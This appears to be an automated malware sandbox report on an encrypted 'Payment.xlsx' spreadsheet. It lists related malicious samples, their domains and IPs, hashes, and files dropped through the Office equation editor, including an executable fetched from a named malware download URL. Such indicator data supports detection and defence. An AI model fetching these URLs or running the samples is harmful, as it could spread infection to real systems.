                                                                                                                                                              • www.localeastbay.com/xle/?LFQLRZ=E0pVt0SD/c6cjw8B7rNDtvuitkx+mv2nZsT+uLlUSSE0kMh9c3r1xcNAL16Y1e/bK4TSnA==&1brt=kvgpkNCXb4
                                                                                                                                                              NWvnpLrdx4.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.pendekar-qq.xyz/da0a/?0pn=3idupu15OOeW9zfMjMdgut9mS0cjf15hkTqMaFLLCpXgHo77noPJVLOm8UPOedJyS0V+rQvXng==&D6Ap=ZfoTzbtx3ht
                                                                                                                                                              LbxEsmtt9T.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.winton.school/xle/?CRi=_DKdFjZ&b6=63sZlfPxpYub/3CVsezcfMIXyleq3IuiloyLDgT7uRWOzgoiAeet3YMsJrqLIatkyaHP
                                                                                                                                                              j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.accessible.legal/csv8/?R0G=dhrxP2v88TRtsx&Bz=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx+vzGuPbqxiE
                                                                                                                                                              ins.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.seak.xyz/uds2/?RZBxhprX=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpukeTtFbirQ9P&2dnDH=hpyPs2spXhIX0dH0
                                                                                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ido.lgbt/rbg/?XbfTxRJp=hIAXe7F1z8L2t8PUj0dDc1RC7hWn72SE/UIhq0x6lMU4/eENencvYGY83Ko+Mq4roz52&Ez=ltxdLDm
                                                                                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.doggybargains.com/nki/?-Z1l=TOQH/B74eY+lLUBsPfn02/AyeWt7NTM3T5MQ11peB6QiRzS5xhI/XYvznnh8++9i+D38b9u5AQ==&5ju=UlSpo
                                                                                                                                                              bpW4Utvn8eAozb4.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.melaninswagger.com/2bb/?QDK=LleDzhh0FB3X&JtO=JOwLIjZiq2GNu+Jzxas6FSG4+h7nxGCMl3lRW3DKuz7LNyZoo5mrJ0KVtcpv9YkCbORqSXqerA==

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              parkingpage.namecheap.comw73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.212
                                                                                                                                                              Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.212
                                                                                                                                                              d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.212
                                                                                                                                                              REVISED PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.217
                                                                                                                                                              z5Wqivscwd.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              register.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.217
                                                                                                                                                              24032130395451.pdf .exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              PO17439.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.215
                                                                                                                                                              pdf Re revised PI 900tons.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.216
                                                                                                                                                              YJgdGYWCni.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              Passport_ID_jpg.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              Taekwang Quote - 210421_001.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.218
                                                                                                                                                              1400000004-arrival.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.211
                                                                                                                                                              qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.217
                                                                                                                                                              uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.216
                                                                                                                                                              dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                              • 198.54.117.210
                                                                                                                                                              www.arfjkacsgatfzbazpdth.com74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              will.kasraz.com01efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • 192.3.122.177
                                                                                                                                                              01efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • 192.3.122.177
                                                                                                                                                              cdl-lb-1356093980.us-east-1.elb.amazonaws.comofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 18.205.135.125
                                                                                                                                                              CIVIP-8287377.exeGet hashmaliciousBrowse
                                                                                                                                                              • 54.165.198.12

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              AMAZON-AESUSpresentation.jarGet hashmaliciousBrowse
                                                                                                                                                              • 34.202.206.65
                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                              • 34.202.206.65
                                                                                                                                                              heUGqZXAJv.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.17.5.224
                                                                                                                                                              2bb0000.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.16.249.42
                                                                                                                                                              2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                              • 23.21.48.44
                                                                                                                                                              SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 54.243.154.178
                                                                                                                                                              MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 54.204.119.115
                                                                                                                                                              Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 54.163.9.216
                                                                                                                                                              detection.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.212.215.225
                                                                                                                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                              • 52.202.22.6
                                                                                                                                                              #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                                                                                                              • 23.21.53.13
                                                                                                                                                              OB74.vbsGet hashmaliciousBrowse
                                                                                                                                                              • 54.91.196.22
                                                                                                                                                              3e98fa2d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 54.235.83.248
                                                                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.223.115.185
                                                                                                                                                              Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 3.227.195.104
                                                                                                                                                              0429_1556521897736.doc_berd.dllGet hashmaliciousBrowse
                                                                                                                                                              • 54.225.169.203
                                                                                                                                                              KnAY2OIPI3Get hashmaliciousBrowse
                                                                                                                                                              • 54.161.176.221
                                                                                                                                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.223.115.185
                                                                                                                                                              pVrqrGltiL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.233.171.147
                                                                                                                                                              b3516494_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 3.223.115.185
                                                                                                                                                              AS-COLOCROSSINGUSPO.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 198.23.207.121
                                                                                                                                                              Refno.191938.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 198.23.213.57
                                                                                                                                                              tetup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 23.94.41.215
                                                                                                                                                              sample04052021.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 192.3.122.199
                                                                                                                                                              Pending DHL Shipment Notification REF 04521.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 198.23.207.82
                                                                                                                                                              29f6b8ff_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              33075048_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              bf10a8ed_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              b6379798_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              ef2ccb56_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              57e4e9e9_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              49aa838c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              b3976dff_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              cdce1cb3_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              faf01c9e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              2044d4ec_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              df024c6e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              87be565b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              a856bf89_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              0a71c578_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              ABOVE-AS-APAboveNetCommunicationsTaiwanTW74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              INTERQGMOInternetIncJPc647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 157.7.44.172
                                                                                                                                                              bdc0c7d3_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.72
                                                                                                                                                              DHL_S390201.exeGet hashmaliciousBrowse
                                                                                                                                                              • 118.27.99.28
                                                                                                                                                              AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              SOA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.52.102
                                                                                                                                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              MrV6Do8tZr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              WGv1KTwWP5.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              Fax scanned 14-04-2021.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              INV#609-005.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.185.226

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):665600
                                                                                                                                                              Entropy (8bit):7.6258646097638785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                                                                                                              MD5:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              SHA1:ACBCECF7599D3C33F6F2A36C0947CFC633D0A406
                                                                                                                                                              SHA-256:9E189D8D48A66D2F53C972275642DA7CBC8AD51B20F04CF1D592BEF360DB50CF
                                                                                                                                                              SHA-512:35E43A0F2EF1DD2DFAF921D8AF3A4F3EF0F4675479D496141358561C84A3B8C8B1A5BD9497FE6C26757D3E6637EDAB538AC587D73BC6D47E9B90B751ABF55BA3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Reputation:low
                                                                                                                                                              IE Cache URL:http://will.kasraz.com/a/so.exe
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V..`..............P.............&=... ...@....@.. ....................................@..................................<..O....@.......................`....................................................... ............... ..H............text...,.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......,n...m...............`...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....o....(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E4BFD36.png
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):79394
                                                                                                                                                              Entropy (8bit):7.864111100215953
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B2ABFC3.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):653280
                                                                                                                                                              Entropy (8bit):2.8986392617606107
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:f34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:/4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                              MD5:08C97F7538AB65F8E3F78D0787C3AF7A
                                                                                                                                                              SHA1:C59A376CF9FE5B44D580891747B383DA724F144F
                                                                                                                                                              SHA-256:EF439381C92C42989797C8B0D7460791156C54AC7FC2BCD741FA6120DFBF80EA
                                                                                                                                                              SHA-512:E61BA4589BAF5BC714B1E16E36AA840FDD5E3BDA16C995D238D87D88299E29D964DB983A84FA726F3CC74C26105D44EF91074381E52D83F307B5D6EF72F759C6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................-...-.......-...-..N._..-...-.....l.-...-..N._..-...-. ....yg^..-...-. ............zg^............O...............................X...%...7...................{ .@................C.a.l.i.b.r...............-.X.....-.0.-..2`^........l.-.l.-..{^^......-.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ..E6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7337552
                                                                                                                                                              Entropy (8bit):1.6350000486784952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:mhIww9GjS9WajgfUJt3hIww9GjS9WajgfUJtn:uw9Gkr9w9Gkrn
                                                                                                                                                              MD5:E43D498A7EE295C05D88E063BBB703BD
                                                                                                                                                              SHA1:5EB0D80A489A90AE5C650ACF1EDEB3DD95FA276E
                                                                                                                                                              SHA-256:483BCCB76820466FFFB1BB06D3436D7B79B48F600CCA539FD2F514120CD08D78
                                                                                                                                                              SHA-512:62211CDC58A2D4364077387C9E89C8782A1437FCB2C77C7FF378A8F2FD20C9E99550C4F520473C844EF8A5B5487E615834D7D839D54D57B86B5C1C148A2B2F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l...........................d....c.. EMF....P.o.....................V...........................fZ..U"..F.....7...7.GDIC........?..^......7.......J.....+...................+.......................+...A. ...........+.......(.....................7.................========================================================================================================================================================================ZZZ}}}................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C39E6EE8.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5376
                                                                                                                                                              Entropy (8bit):5.0441612941917615
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:p2NmAZb6pvCa4ukzw+Lv6KbLSNRyBLf2qoCfVYIrxQ2PNrYJf66QpTIZTAo0zQnw:cUvZ0LbLSNR8L5oCNYdWN8M6QNcvBvPy
                                                                                                                                                              MD5:74DB540A0F8EADF65B6CA25FD6B93D18
                                                                                                                                                              SHA1:4E49830309156268990DAC2684DFA479764718FD
                                                                                                                                                              SHA-256:7D07D91D712C32A5E2D8F3EAF68649CF533573F7963E6BE9D834446908DA525E
                                                                                                                                                              SHA-512:572DF79363F7E2CB187C9024B9FFFB0D5168CE1227F7781E2BA056BA1B77800AE0E193CDE350021D70ACABA8B0E6CBE1A4D290817006B7F2C8B541EBC233D6CF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l.............../...........?(..q... EMF............................V...........................fZ..U"..........................#...5...R...p...................................S.e.g.o.e. .U.I...................................................av.V..O.f.f.i.c.e.1.2.\.E.X.C.E.L.........gY.s........D.jj..........av.{Yu.eau ...t...0...8{Yu.T.v..Yu.... ... ..../.v.s.w..jj..+...+........v....4...h...,...._u5.....6.4.....v........./.v...w..jj.................Y.s.................V.......gbv........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3E411C9.png
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):79394
                                                                                                                                                              Entropy (8bit):7.864111100215953
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                              C:\Users\user\Desktop\~$Payment.xlsx
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):330
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\Public\vbc.exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):665600
                                                                                                                                                              Entropy (8bit):7.6258646097638785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                                                                                                              MD5:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              SHA1:ACBCECF7599D3C33F6F2A36C0947CFC633D0A406
                                                                                                                                                              SHA-256:9E189D8D48A66D2F53C972275642DA7CBC8AD51B20F04CF1D592BEF360DB50CF
                                                                                                                                                              SHA-512:35E43A0F2EF1DD2DFAF921D8AF3A4F3EF0F4675479D496141358561C84A3B8C8B1A5BD9497FE6C26757D3E6637EDAB538AC587D73BC6D47E9B90B751ABF55BA3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V..`..............P.............&=... ...@....@.. ....................................@..................................<..O....@.......................`....................................................... ............... ..H............text...,.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......,n...m...............`...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....o....(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:CDFV2 Encrypted
                                                                                                                                                              Entropy (8bit):7.98035578403973
                                                                                                                                                              TrID:
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                              File name:Payment.xlsx
                                                                                                                                                              File size:1363456
                                                                                                                                                              MD5:05f49aa5b342dedd1d7b6673f3d8bc41
                                                                                                                                                              SHA1:9ca061b9851269f8b1d2fd990ebe119903a5f0fb
                                                                                                                                                              SHA256:3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
                                                                                                                                                              SHA512:dc296422a45c34721b0746b1b3b34581def5b69b081718e790d4ad75e9e67c6f1afd6a5197ee48fba9d1d7c574ac95a4797b29ad4b2bfc094580fffa78513f2b
                                                                                                                                                              SSDEEP:24576:iiOiNObhnSFbuLWFBMNbjlq2W6g4t0RH/UXOal6UKcv1eytV:LOi4hobc1P7/CC6LiUqV
                                                                                                                                                              File Content Preview:........................>...................3....................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2..

                                                                                                                                                              File Icon

